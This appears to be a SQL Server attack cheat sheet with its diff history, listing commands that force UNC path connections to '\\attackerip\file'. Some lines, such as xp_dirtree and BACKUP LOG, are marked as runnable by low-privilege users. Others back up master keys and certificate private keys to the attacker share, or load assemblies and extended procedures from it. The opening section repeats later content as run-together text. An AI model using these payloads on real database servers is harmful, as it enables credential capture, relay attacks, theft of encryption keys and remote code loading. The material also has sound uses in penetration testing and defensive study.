https://technet.microsoft.com/library/security/MS16-131RESTORE REWINDONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - VERIFYONLY-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'GO-------------------------------------------------------- Executable by the Sysadmin fixed server-- and with other non Public roles / privileges-------------------------------------------------------- Note: Almost every function and stored procedure that supports a file path allows UNC paths by design.-- Create assemblyCREATE ASSEMBLY HelloWorld FROM '\\attackerip\file' WITH PERMISSION_SET = SAFE;  GO-- Add exteneded stored proceduresp_addextendedproc 'xp_hello','\\attackerip\file'-- Create CertificateCREATE CERTIFICATE testing123      FROM EXECUTABLE FILE = '\\attackerip\file';GO  -- Backup CertificateBACKUP CERTIFICATE test01 TO FILE = '\\attackerip\file' WITH PRIVATE KEY (decryption by password = 'superpassword', FILE = '\\attackerip\file', encryption by password = 'superpassword');go-- Backup to file - Master KeyBACKUP MASTER KEY TO FILE = '\\attackerip\file' ENCRYPTION BY PASSWORD = 'password'GO-- Backup to file - Service Master KeyBACKUP SERVICE MASTER KEY TO FILE = '\\attackerip\file' ENCRYPTION BY PASSWORD = 'password'go-- Restore from file - Master KeyRESTORE MASTER KEY FROM FILE = '\\attackerip\file' DECRYPTION BY PASSWORD = 'password' ENCRYPTION BY PASSWORD = 'password'go-- Restore from file - Service Master KeyRESTORE SERVICE MASTER KEY FROM FILE = '\\attackerip\file' DECRYPTION BY PASSWORD = 'password'go-- Read data from file - Bulk insert 1CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))BULK INSERT #TEXTFILE FROM '\\attackerip\file' DROP TABLE #TEXTFILE-- Read data from file - Bulk insert 2CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))BULK INSERT #TEXTFILE FROM '\\attackerip\file' WITH (FORMATFILE = '\\testing21\file')DROP TABLE #TEXTFILE-- Read data from a file - fn_xe_file_target_read_fileSELECT * FROM sys.fn_xe_file_target_read_file ('\\attackerip\file','\\attackerip\file',null,null)GO-- Read data from a file - fn_get_audit_fileSELECT * FROM sys.fn_get_audit_file ('\\attackerip\file','\\attackerip\file',default,default);  GO  -- Create Server Audit to FileCREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\attackerip\file');GO-- Install a cryptographic provider  sp_configure 'EKM provider enabled',1RECONFIGUREGOCREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\attackerip\file';  GO-- External file format - Azure onlyCREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');GO -- xp_regwrite has write privilegs to recursively (for the most part)-- there are a number of backup and logging file paths that could be used to UNC path injectionHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\<INSTANCE> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\SQLAgent$<INSTANCE>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\80\Replication
diff --git a/SQL Server UNC Path Injections b/SQL Server UNC Path Injections
@@ -140,3 +140,9 @@ GO
 -- External file format - Azure only
 CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');
 GO 
+
+-- xp_regwrite has write privilegs to recursively (for the most part)
+-- there are a number of backup and logging file paths that could be used to UNC path injection
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\<INSTANCE> 
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\SQLAgent$<INSTANCE>
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\80\Replication
diff --git a/SQL Server UNC Path Injections b/SQL Server UNC Path Injections
@@ -0,0 +1,142 @@
+
+--
+-- Short list of SQL Server commands that support UNC path [injections] by default
+-- Note: This is not a complete list.
+--
+
+--------------------------------------------------------
+-- Executable by the Public fixed server role by default
+--------------------------------------------------------
+-- Note: All are supported by SQL Server 2000 to 2014
+
+-- Get directory listing
+xp_dirtree '\\attackerip\file'
+GO
+
+-- Check if file exists
+xp_fileexist '\\attackerip\file'
+GO
+
+-- Backup to file - Database Log
+-- Note: Public can't actually execute the backup, but the UNC path is resolved first
+BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
+GO
+
+-- Backup to file - Database
+-- Note: Public can't actually execute the backup, but the UNC path is resolved first
+BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
+GO
+
+-- Restore from file - Log
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
+
+-- Restore from file - Database
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - HEADERONLY
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - FILELISTONLY
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - LABELONLY 
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+RESTORE LABELONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - REWINDONLY 
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - VERIFYONLY
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
+GO
+
+------------------------------------------------------
+-- Executable by the Sysadmin fixed server
+-- and with other roles / privileges
+------------------------------------------------------
+-- Note: Almost every function and stored procedure that supports a file path allows UNC paths by design.
+
+-- Create assembly
+CREATE ASSEMBLY HelloWorld FROM '\\attackerip\file' WITH PERMISSION_SET = SAFE;  
+GO
+
+-- Add exteneded stored procedure
+sp_addextendedproc 'xp_hello','\\attackerip\file'
+
+-- Create Certificate
+CREATE CERTIFICATE testing123  
+    FROM EXECUTABLE FILE = '\\attackerip\file';
+GO  
+
+-- Backup Certificate
+BACKUP CERTIFICATE test01 TO FILE = '\\attackerip\file'
+	WITH PRIVATE KEY (decryption by password = 'superpassword',
+	FILE = '\\attackerip\file',
+	encryption by password = 'superpassword');
+go
+
+-- Backup to file - Master Key
+BACKUP MASTER KEY TO FILE = '\\attackerip\file'
+	ENCRYPTION BY PASSWORD = 'password'
+GO
+
+-- Backup to file - Service Master Key
+BACKUP SERVICE MASTER KEY TO FILE = '\\attackerip\file'
+	ENCRYPTION BY PASSWORD = 'password'
+go
+
+-- Restore from file - Master Key
+RESTORE MASTER KEY FROM FILE = '\\attackerip\file'
+	DECRYPTION BY PASSWORD = 'password'
+	ENCRYPTION BY PASSWORD = 'password'
+go
+
+-- Restore from file - Service Master Key
+RESTORE SERVICE MASTER KEY FROM FILE = '\\attackerip\file'
+	DECRYPTION BY PASSWORD = 'password'
+go
+
+-- Read data from file - Bulk insert 1
+CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))
+BULK INSERT #TEXTFILE FROM '\\attackerip\file' 
+DROP TABLE #TEXTFILE
+
+-- Read data from file - Bulk insert 2
+CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))
+BULK INSERT #TEXTFILE FROM '\\attackerip\file' 
+WITH (FORMATFILE = '\\testing21\file')
+DROP TABLE #TEXTFILE
+
+-- Read data from a file - fn_xe_file_target_read_file
+SELECT * FROM sys.fn_xe_file_target_read_file ('\\attackerip\file','\\attackerip\file',null,null)
+GO
+
+-- Read data from a file - fn_get_audit_file
+SELECT * FROM sys.fn_get_audit_file ('\\attackerip\file','\\attackerip\file',default,default);  
+GO  
+
+-- Create Server Audit to File
+CREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\attackerip\file');
+GO
+
+-- Install a cryptographic provider  
+sp_configure 'EKM provider enabled',1
+RECONFIGURE
+GO
+CREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\attackerip\file';  
+GO
+
+-- External file format - Azure only
+CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');
+GO